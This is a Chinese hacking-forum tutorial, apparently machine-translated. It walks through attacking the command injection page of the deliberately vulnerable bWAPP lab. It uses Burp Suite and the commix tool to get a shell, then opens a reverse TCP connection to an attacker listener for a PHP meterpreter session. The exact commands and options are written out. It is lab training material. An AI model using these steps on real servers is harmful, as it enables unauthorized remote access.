渗透工具实战:使用Commix对Meterpreter进行命令注入攻击

zevseo
16030zevseo大版主
2018-09-12 02:07:15
16030 2018-09-12 02:07:15
在本文中,我将展示如果严重的操作系统注入漏洞并尝试访问meterpreter shell,您可以轻松地使用commix工具破解Web服务器。
Attaker:kali Linux
目标:bwapp
此处下载并使用VM ware安装和运行它。
作为浏览器中的攻击者浏览器目标IP :192.168.0.105/bwapp,现在使用bee登录:bug作为凭证并从选择您的错误中选择OS命令注入 ; 然后单击的黑客

描述:使用Commix对Meterpreter进行命令注入攻击

图片:1912.png

使用Commix对Meterpreter进行命令注入攻击

这里请求的网页打开,您可以在其中执行任何命令。现在我将启动burp suite来捕获请求。要开始拦截,请单击代理选项卡启用拦截 ; 不要忘记在浏览器中运行代理。现在给像IP的任何命令:192.168.0.105,并单击查找

描述:使用Commix对Meterpreter进行命令注入攻击

图片:2.png

使用Commix对Meterpreter进行命令注入攻击

在Burp套件中,您将获得已发布的邮件请求。在这里,我们有受害者的详细信息,这将有助于对其Web服务器进行攻击。现在从POST中选择整个数据...... &form = submit然后将其复制保存在文本文件中。我已将其保存为os.txt并进一步将其与commix一起使用。

描述:使用Commix对Meterpreter进行命令注入攻击

图片:3.png

使用Commix对Meterpreter进行命令注入攻击

之前的教程中,我们使用了手动步骤在commix中执行给定的命令以进行攻击,但这里的步骤更容易和方便申请进行攻击。现在键入以下命令以使commix开始攻击。

commix -r /root/Desktop/os.txt

点击输入按Y作为每个问题的回复。从给定的屏幕截图中你可以看到我有受害者的shell,在这里我执行了以下命令来检索受害者的详细信息。


whoami
id

描述:使用Commix对Meterpreter进行命令注入攻击

图片:4.png

使用Commix对Meterpreter进行命令注入攻击

现在使用以下步骤启动反向tcp连接。


commix(os_shell) > reverse_tcp
commix(reverse_tcp) > set lhost 192.168.0.104
commix(reverse_tcp) > set lport 8888
选项要求commix为其他反向TCP shell设置连接类型'2'的后门。

commix(reverse_tcp) > 2

选项要求通过commix设置目标类型'5'以使用php meterpreter reverse tcp shell。

commix(reverse_tcp) >5

描述:使用Commix对Meterpreter进行命令注入攻击

图片:6.png

使用Commix对Meterpreter进行命令注入攻击

复制突出显示的文本并将粘贴到另一个终端上,该终端将加载metasploit框架并在后台自动启动多处理程序。

描述:使用Commix对Meterpreter进行命令注入攻击

图片:7.png

使用Commix对Meterpreter进行命令注入攻击

一旦metasploit被加载,然后移回到运行commix的前一个终端点击这里输入

描述:使用Commix对Meterpreter进行命令注入攻击

图片:8.png

使用Commix对Meterpreter进行命令注入攻击

从给定的屏幕截图中你可以看到我有一个meterpreter shell。

meterpreter>sysinfo

描述:使用Commix对Meterpreter进行命令注入攻击

图片:9.png

使用Commix对Meterpreter进行命令注入攻击

本文标题:渗透工具实战:使用Commix对Meterpreter进行命令注入攻击
本文作者:zevseo
本文来自:蚁安黑客官网
转载请注明本文链接:http://bbs.mayidui.net/t2331.html
游客
登录黑客论坛后才可以回帖,黑客登录 或者 注册黑客
weixin
蚁安黑客

找黑客工具、找黑客教程、找黑客朋友,你想不到的黑客技术这儿都有!

微信号:baiyiwangan